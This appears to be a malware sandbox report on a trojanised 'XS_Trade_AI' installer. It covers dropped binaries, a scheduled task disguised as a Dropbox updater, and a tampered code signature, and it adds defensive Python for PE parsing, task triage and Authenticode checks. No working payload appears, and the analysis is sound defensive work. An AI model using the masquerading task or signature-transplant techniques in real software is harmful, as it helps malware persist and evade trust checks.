                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):237568
                                                                                                                                            Entropy (8bit):6.42067568634536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                                            MD5:55C310C0319260D798757557AB3BF636
                                                                                                                                            SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                                            SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                                            SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):847360
                                                                                                                                            Entropy (8bit):6.655399003035542
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:N5Oh3oXwjoThmYgKmRCcBcIGvymfIRNM9+1nG0:Ng9ogjoVsRlBAPV+40
                                                                                                                                            MD5:6482EE0F372469D1190C74BD70D76153
                                                                                                                                            SHA1:9001213D28E5B0B18AA24114A38A1EFE1A767698
                                                                                                                                            SHA-256:4B7FC7818F3168945DBEDADCFD7AAF470B88543EF6B685619AD1C942AC3B1DED
                                                                                                                                            SHA-512:6A5C2BDF58CD8DEADF51302D8F8B17A14908809EF700A1E366E7D107B1E22ABE8CAF1F68E7EB9D35E9B519793699C3492323F6577C3569A56AC3C845516625F3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........................r...........................l...r..........1....<............#'....i......6.....Rich..........................PE..L...0DCf.............................U............@.......................................@..................................j..x....`.......................p..0g......................................................P............................text............................... ..`.rdata...g.......h..................@..@.data................f..............@....sxdata......P.......n..............@....rsrc........`.......p..............@..@.reloc...u...p...v...x..............@..B................................................................................................................................................................................................................................
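Every "File Type" line in these entries is derived from the header bytes shown in the preview: the byte after "PE.." is the low byte of the Machine field ('d' for 0x8664, x86-64; 'L' for 0x014C, Intel 80386), the optional-header magic decides PE32 versus PE32+, the DLL characteristic and the subsystem give "(DLL)" and "(GUI)"/"(console)", and the section names (.text, .rdata, .sxdata, .reloc) are readable in the section table. Two pairs of entries (the 6144-byte x86-64 console binary and the 237568-byte i386 DLL) have identical hashes and differ only in the Inno Setup temp directory that dropped them (is-7K4JS.tmp versus is-5ULBA.tmp), and the 2530816-byte entries start with the "MZP" stub and "This program must be run under Win32", the Delphi stub that Inno Setup's setup binary carries. The following is an added example, not code from the Joe Sandbox report: a Python parser that recovers exactly those fields from the first few hundred bytes of a PE and renders them in the report's wording. The test input is a constructed minimal header, not one of the dropped files.

```python
import struct

# IMAGE_FILE_HEADER.Machine and IMAGE_OPTIONAL_HEADER.Magic values from the PE/COFF specification
MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "ARM64"}
MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000


def describe_pe(data: bytes) -> dict:
    """Pull the fields behind a 'File Type' line out of the first few hundred bytes of a PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20                          # IMAGE_FILE_HEADER is 20 bytes
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)   # same offset in PE32 and PE32+
    sec = opt + opt_size                     # section table follows the optional header
    names = []
    for i in range(nsections):
        raw = data[sec + 40 * i:sec + 40 * i + 8]              # IMAGE_SECTION_HEADER is 40 bytes
        names.append(raw.split(b"\x00", 1)[0].decode("ascii", "replace"))
    return {
        "format": MAGIC.get(magic, hex(magic)),
        "machine": MACHINES.get(machine, hex(machine)),
        "kind": "DLL" if chars & IMAGE_FILE_DLL else "executable",
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "sections": names,
    }


def file_type_line(info: dict) -> str:
    """Render describe_pe() output in the wording the report's File Type column uses."""
    kind = "executable (DLL)" if info["kind"] == "DLL" else "executable"
    return f"{info['format']} {kind} ({info['subsystem']}) {info['machine']}, for MS Windows"


def build_pe(machine: int, magic: int, subsystem: int, dll: bool, sections) -> bytes:
    """Constructed test input: a minimal, non-loadable PE header (not one of the report's files)."""
    opt_size = 240 if magic == 0x20B else 224
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)          # 0x0002 = IMAGE_FILE_EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, chars)
    table = b"".join(n.encode().ljust(8, b"\x00") + bytes(32) for n in sections)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew: PE header right after the DOS header
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


if __name__ == "__main__":
    sample = build_pe(0x8664, 0x20B, 3, False, [".text", ".rdata", ".data", ".pdata", ".rsrc"])
    print(file_type_line(describe_pe(sample)))
```

The parser deliberately stops at the section names: that is all the File Type and preview columns show, and reading imports or resources would mean following RVAs into data the report does not reproduce. The "MZP" stub needs no special handling because the PE header behind it is standard; only the DOS stub text differs.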
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (321)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1836
                                                                                                                                            Entropy (8bit):4.976117259434148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cqhUwAbXxsK7vYuFdOFQO033ODOiQdKrZuTYcv:lhUvYuFdOFQOMdKrZuZ
                                                                                                                                            MD5:3B988A294EC66002BDD6B23074122541
                                                                                                                                            SHA1:4322BC5F4E20EACFB19CC4E2B35A8D5701694833
                                                                                                                                            SHA-256:B265D168589A6B1E5C4F54ADEB14666E2A3CC182DC1B400237E03CD19F26339F
                                                                                                                                            SHA-512:00D9A35D9AFA9177AAB78485173DD9CFAD1EC641E219A25326E9BF01968FD60994398745D9AFE6F869B4C2E14E8AE962203090069285ED6C58856DE9D6C8616F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Description>Keeps your Dropbox software up to date. If this task is disabled or stopped, your Dropbox software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This task uninstalls itself when there is no Dropbox software using it.</Description>. </RegistrationInfo>. <Triggers>. <TimeTrigger>. <Repetition>. <Interval>PT10M</Interval>. <StopAtDurationEnd>false</StopAtDurationEnd>. </Repetition>. <StartBoundary>2023-08-10T00:00:00</StartBoundary>. <Enabled>true</Enabled>. </TimeTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>IgnoreNew</MultipleInstances
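The XML above is the task definition behind the "Uses schtasks.exe or at.exe" and "Scheduled temp file as task from temp location" signatures: a Dropbox-updater description copied word for word, a TimeTrigger repeating every ten minutes (PT10M), an interactive least-privilege principal, and a declaration claiming UTF-16 on a file libmagic identifies as ASCII. The report truncates the preview before the Actions element, so the command the task runs is not visible here. The following is an added example, not part of the Joe Sandbox report: a Python triage routine that parses a Task Scheduler XML, pulls the description, repetition interval and Exec commands, and flags the combination of a vendor name in the description with no action path containing it, a short repeat interval, and an action under a user-writable directory. The sample task is constructed: its RegistrationInfo, Triggers and Principals follow the preview, while the Exec command is a placeholder path chosen for the example, and the vendor list and path patterns are this example's assumptions.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
VENDORS = ("Dropbox", "Google", "Microsoft", "Adobe")    # assumption: names worth cross-checking
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Temp|Users\\Public|ProgramData)\\", re.I)

# Constructed sample. RegistrationInfo, Triggers and Principals follow the report's preview;
# the report truncates before <Actions>, so the Exec command is a placeholder, not the real one.
SAMPLE_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Description>Keeps your Dropbox software up to date. If this task is disabled or stopped, your Dropbox software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This task uninstalls itself when there is no Dropbox software using it.</Description>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT10M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2023-08-10T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Local\Temp\placeholder.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def iso_duration_seconds(value: str) -> int:
    """Seconds in an ISO-8601 duration of the PnDTnHnMnS shape Task Scheduler writes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value)
    if not m or value in ("P", "PT"):
        raise ValueError(f"unsupported duration {value!r}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def triage_task(xml_text: str) -> dict:
    """Extract the fields that matter for a persistence review and list the findings."""
    # The declaration says UTF-16 while the bytes are ASCII; drop it rather than trust it.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).lstrip()
    root = ET.fromstring(body)
    desc = root.findtext(f"{NS}RegistrationInfo/{NS}Description") or ""
    interval = root.findtext(f".//{NS}Repetition/{NS}Interval")
    commands = [(e.text or "").strip() for e in root.iter(f"{NS}Command")]
    findings = []
    vendor = next((v for v in VENDORS if v.lower() in desc.lower()), None)
    if vendor and not any(vendor.lower() in c.lower() for c in commands):
        findings.append(f"description names {vendor} but no action path contains it")
    if interval and iso_duration_seconds(interval) <= 600:
        findings.append(f"trigger repeats every {interval}")
    for cmd in commands:
        if USER_WRITABLE.search(cmd):
            findings.append(f"action runs from a user-writable path: {cmd}")
    return {"description": desc, "interval": interval, "commands": commands, "findings": findings}


if __name__ == "__main__":
    for line in triage_task(SAMPLE_TASK)["findings"]:
        print(line)
```

The vendor check is deliberately a cross-check rather than a blocklist: a genuine Dropbox updater task also describes itself as one, so the signal is the description naming a product that the action path never mentions. The interval threshold of ten minutes is the value seen in this sample and is an assumption to tune, not a rule from the report.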
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe
                                                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):538
                                                                                                                                            Entropy (8bit):5.1112184726268675
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:pt6wnRwsfDLsyTAfRtmFyYfRtcWJA1tNqj:ptfwsfDLsyTAfbmTfbcWJAv6
                                                                                                                                            MD5:D780E3A83DEE11439F7288939F012FB0
                                                                                                                                            SHA1:70EE8F9B47D1F06923379539F8FCFBBE4F874286
                                                                                                                                            SHA-256:1826FA126CA1E5B9520072CD60711B673A55BCA4A98F2D5E5FD9FE0739929764
                                                                                                                                            SHA-512:95EEC98F76438CCDF05BEDF30D266FD63EA258D507595C8CE77E501375794F53B64ECF7A9DE57D850F7D1DBEFFFCDF27F62189A8993A7E498CE2BFB67CAC6462
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..7-Zip (a) 24.05 (x86) : Copyright (c) 1999-2024 Igor Pavlov : 2024-05-14....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\. .1 file, 7108996 bytes (6943 KiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip..--..Path = C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip..Type = zip..Physical Size = 7108996.... 0%. .Everything is Ok....Size: 7278842..Compressed: 7108996..
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.774088787923903
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                                            • InstallShield setup (43055/19) 0.42%
                                                                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                            File name:XS_Trade_AI-newest_release_.exe
                                                                                                                                            File size:2'528'268 bytes
                                                                                                                                            MD5:869366922ec1233b2fd7adacb0ce27c3
                                                                                                                                            SHA1:8980ef4149a7b3f357f9d114735e9797cd607e84
                                                                                                                                            SHA256:a0041464eaecdb08119b38f377c919e512610307cd7f994aba11c02112fb6777
                                                                                                                                            SHA512:7d4095e6cac86713dd3354c99b23b7455e472ce7966cf774b797081dd4ac0da493b732429cd47c41faa11bd14415b7f33ce2ff94fffbebdd5af6fee958808713
                                                                                                                                            SSDEEP:49152:bcW4fc5du6I0Tz5x5xZzOIf54pe+ZGUFSawC94yXf:bX4k5dhlJLbzOa4peeRF14yv
                                                                                                                                            TLSH:8AC5E127B298A53EC4AA27350673B01058FBB66DF417BE1677F4C48CCF664C01E3AA65
                                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                            Icon Hash:2d2e3797b32b2b99
                                                                                                                                            Entrypoint:0x4a7ed0
                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x5C61BB3C [Mon Feb 11 18:13:16 2019 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:eb5bc6ff6263b364dfbfb78bdb48ed59
                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the file's Authenticode hash no longer matches the digest inside the signature, which is what you see when a signed file is modified afterwards or a signature blob is transplanted from another file)
Not Before:24/07/2024 06:16:20
Not After:27/08/2026 10:33:53
                                                                                                                                            Subject Chain
                                                                                                                                            • E=support@softwareok.com, CN=Nenad Hrg, O=Nenad Hrg, STREET=Edelweissstr. 104, L=Taufkirchen, S=Bayern, C=DE, OID.1.3.6.1.4.1.311.60.2.1.1=Taufkirchen, OID.1.3.6.1.4.1.311.60.2.1.2=Bayern, OID.1.3.6.1.4.1.311.60.2.1.3=DE, SERIALNUMBER=2016, OID.2.5.4.15=Private Organization
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:02FA1932AC9D3D360F3D0323CCDA30EC
                                                                                                                                            Thumbprint SHA-1:0181DA2D78A2EC6E6966C59A0A663E9D8F0C2F93
                                                                                                                                            Thumbprint SHA-256:AD02A24C8D2FFBC5F7E946048F23967690A9EE43C5B6842093AD345CA83FB7B5
                                                                                                                                            Serial:688627716A10C6EBD3648632
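The chain above is a real GlobalSign EV code-signing certificate issued to the author of DontSleep, the legitimate SoftwareOK tool the installer unpacks as DontSleep_x64.zip in the 7-Zip log above, yet the signature does not verify. That combination is the fingerprint of a signature that was valid for different bytes: Authenticode hashes everything in the image except the CheckSum field, the Security data-directory entry and the certificate table itself, so repackaging the installer payload (the overlay behind the sections) changes the digest while a transplanted certificate blob stays intact and its chain still looks fine. The script below is an added example, not Joe Sandbox output or code from either vendor: it computes that digest with the standard library, walks the WIN_CERTIFICATE table so the PKCS#7 blob can be handed to openssl, and uses a constructed toy PE (build_toy_pe, a fixture for this example only) to show which edits do and do not change the digest.

```python
"""Authenticode digest of a PE using only the standard library (added example).
The digest skips the CheckSum field, the Security data-directory entry and the
certificate table; everything else, overlay included, is covered by the signature."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0200, 0x0002


def _layout(pe: bytes) -> dict:
    """Locate the fields Authenticode treats specially."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24  # optional header follows the 20-byte file header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:  # PE32: data directories start at +96
        dd = opt + 96
    elif magic == 0x20B:  # PE32+: at +112
        dd = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sec_dir = dd + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", pe, sec_dir)
    sections = []
    for i in range(n_sections):  # SizeOfRawData, PointerToRawData sit at +16 of each 40-byte entry
        raw_size, raw_ptr = struct.unpack_from("<II", pe, opt + opt_size + 40 * i + 16)
        if raw_size:
            sections.append((raw_ptr, raw_size))
    return {"checksum": opt + 64,  # same offset in PE32 and PE32+
            "sec_dir": sec_dir,
            "size_of_headers": struct.unpack_from("<I", pe, opt + 60)[0],
            "sections": sorted(sections),  # hashed in PointerToRawData order
            "cert_off": cert_off, "cert_size": cert_size}


def authenticode_digest(pe: bytes, algo: str = "sha256") -> str:
    """Hex digest the signer commits to in the PKCS#7 messageDigest attribute."""
    lay = _layout(pe)
    h = hashlib.new(algo)
    h.update(pe[:lay["checksum"]])  # headers minus CheckSum ...
    h.update(pe[lay["checksum"] + 4:lay["sec_dir"]])
    h.update(pe[lay["sec_dir"] + 8:lay["size_of_headers"]])  # ... and minus the Security entry
    end = lay["size_of_headers"]
    for raw_ptr, raw_size in lay["sections"]:
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        end = max(end, raw_ptr + raw_size)
    # Overlay after the last section up to the certificate table (for a contiguous
    # section layout this is the spec's SUM_OF_BYTES_HASHED).
    cert_start = lay["cert_off"] if lay["cert_size"] else len(pe)
    h.update(pe[end:cert_start])
    return h.hexdigest()


def certificate_table(pe: bytes) -> list:
    """WIN_CERTIFICATE entries as (wRevision, wCertificateType, bCertificate). Type 2 is
    DER PKCS#7 SignedData: write it out and run `openssl pkcs7 -inform DER -print_certs -in blob.p7b`."""
    lay = _layout(pe)
    pos, stop, out = lay["cert_off"], lay["cert_off"] + lay["cert_size"], []
    while lay["cert_size"] and pos + 8 <= stop:
        length, rev, ctype = struct.unpack_from("<IHH", pe, pos)
        if length < 8:
            break
        out.append((rev, ctype, pe[pos + 8:pos + length]))
        pos += (length + 7) & ~7  # entries are 8-byte aligned
    return out


def build_toy_pe(section: bytes, overlay: bytes = b"", pkcs7: bytes = b"", checksum: int = 0) -> bytes:
    """Constructed fixture for this example: a minimal PE32 with one section, an optional
    overlay and a WIN_CERTIFICATE wrapping `pkcs7`. Not a loadable image."""
    size_of_headers, e_lfanew = 0x200, 0x40
    cert = b""
    if pkcs7:
        cert = struct.pack("<IHH", 8 + len(pkcs7), WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + pkcs7
        cert += b"\0" * (-len(cert) % 8)
    cert_off = size_of_headers + len(section) + len(overlay) if cert else 0
    opt = bytearray(96 + 16 * 8)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 60, size_of_headers)
    struct.pack_into("<I", opt, 64, checksum)
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_off, len(cert))
    sect = (b".text\0\0\0" + struct.pack("<IIII", len(section), 0x1000, len(section), size_of_headers)
            + b"\0" * 12 + struct.pack("<I", 0x60000020))
    hdr = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew) + b"PE\0\0"
           + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102) + bytes(opt) + sect)
    return hdr + b"\0" * (size_of_headers - len(hdr)) + section + overlay + cert


if __name__ == "__main__":
    body = bytes(range(256)) * 4
    signed = build_toy_pe(body, overlay=b"installer payload", pkcs7=b"fake-signed-data")
    repacked = build_toy_pe(body, overlay=b"trojanised payload", pkcs7=b"fake-signed-data")
    print("digest unchanged by certificate swap:", authenticode_digest(signed) == authenticode_digest(build_toy_pe(body, overlay=b"installer payload")))
    print("digest unchanged by overlay tampering:", authenticode_digest(signed) == authenticode_digest(repacked))
```

To check a real file, compare authenticode_digest(open(path, "rb").read()) with the messageDigest attribute inside the extracted SignedData (visible with `openssl asn1parse -inform DER -i -in blob.p7b`), or let `Get-AuthenticodeSignature` or `signtool verify /pa /v` do it; a digest mismatch on a file whose chain otherwise validates is exactly the TRUST_E_BAD_DIGEST result reported above.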
Instruction (entry-point disassembly at 0x4a7ed0 in .itext; the repeated push ebp / push <handler> / push dword ptr fs:[eax] / mov dword ptr fs:[eax], esp sequences, with eax or edx zeroed just before, link Delphi exception frames into the TIB ExceptionList at fs:[0])
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            add esp, FFFFFFA4h
                                                                                                                                            push ebx
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            xor eax, eax
                                                                                                                                            mov dword ptr [ebp-3Ch], eax
                                                                                                                                            mov dword ptr [ebp-40h], eax
                                                                                                                                            mov dword ptr [ebp-5Ch], eax
                                                                                                                                            mov dword ptr [ebp-30h], eax
                                                                                                                                            mov dword ptr [ebp-38h], eax
                                                                                                                                            mov dword ptr [ebp-34h], eax
                                                                                                                                            mov dword ptr [ebp-2Ch], eax
                                                                                                                                            mov dword ptr [ebp-28h], eax
                                                                                                                                            mov dword ptr [ebp-14h], eax
                                                                                                                                            mov eax, 004A2BC0h
                                                                                                                                            call 00007F68EC64225Dh
                                                                                                                                            xor eax, eax
                                                                                                                                            push ebp
                                                                                                                                            push 004A85C2h
                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                            xor edx, edx
                                                                                                                                            push ebp
                                                                                                                                            push 004A857Eh
                                                                                                                                            push dword ptr fs:[edx]
                                                                                                                                            mov dword ptr fs:[edx], esp
                                                                                                                                            mov eax, dword ptr [004B0634h]
                                                                                                                                            call 00007F68EC6D6357h
                                                                                                                                            call 00007F68EC6D5EAEh
                                                                                                                                            lea edx, dword ptr [ebp-14h]
                                                                                                                                            xor eax, eax
                                                                                                                                            call 00007F68EC657888h
                                                                                                                                            mov edx, dword ptr [ebp-14h]
                                                                                                                                            mov eax, 004B3708h
                                                                                                                                            call 00007F68EC63CAE7h
                                                                                                                                            push 00000002h
                                                                                                                                            push 00000000h
                                                                                                                                            push 00000001h
                                                                                                                                            mov ecx, dword ptr [004B3708h]
                                                                                                                                            mov dl, 01h
                                                                                                                                            mov eax, dword ptr [00423698h]
                                                                                                                                            call 00007F68EC6588EFh
                                                                                                                                            mov dword ptr [004B370Ch], eax
                                                                                                                                            xor edx, edx
                                                                                                                                            push ebp
                                                                                                                                            push 004A852Ah
                                                                                                                                            push dword ptr fs:[edx]
                                                                                                                                            mov dword ptr fs:[edx], esp
                                                                                                                                            call 00007F68EC6D63DFh
                                                                                                                                            mov dword ptr [004B3714h], eax
                                                                                                                                            mov eax, dword ptr [004B3714h]
                                                                                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                                                                                            jne 00007F68EC6DCC9Ah
                                                                                                                                            mov eax, dword ptr [004B3714h]
                                                                                                                                            mov edx, 00000028h
                                                                                                                                            call 00007F68EC6591E4h
                                                                                                                                            mov edx, dword ptr [004B3714h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0xb6000          0x9a          .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb4000          0xf1c         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb9000          0x4600        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x266b04         0x2908
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xb8000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xb42e0          0x240         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xb5000          0x1a4         .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Note: the SECURITY entry is a file offset rather than an RVA, which is why it maps to no section; 0x266b04 + 0x2908 = 0x26940c, exactly the 2'528'268-byte file size, so the certificate table is the last thing in the file. The empty BASERELOC entry matches the RELOCS_STRIPPED characteristic above.
Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text    0x1000           0xa50e0       0xa5200   d2d65fadb7b1be676e1248ab404382da  False     0.3560172809424678  data       6.368250598681687   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext   0xa7000          0x1668        0x1800    73e002411a8e0d309143a3e055e89568  False     0.5411783854166666  data       5.950488815097041   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data    0xa9000          0x37a4        0x3800    43e7b93b56ed2b1f2c341832da76e1f0  False     0.3604213169642857  data       5.027871318308703   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss     0xad000          0x676c        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
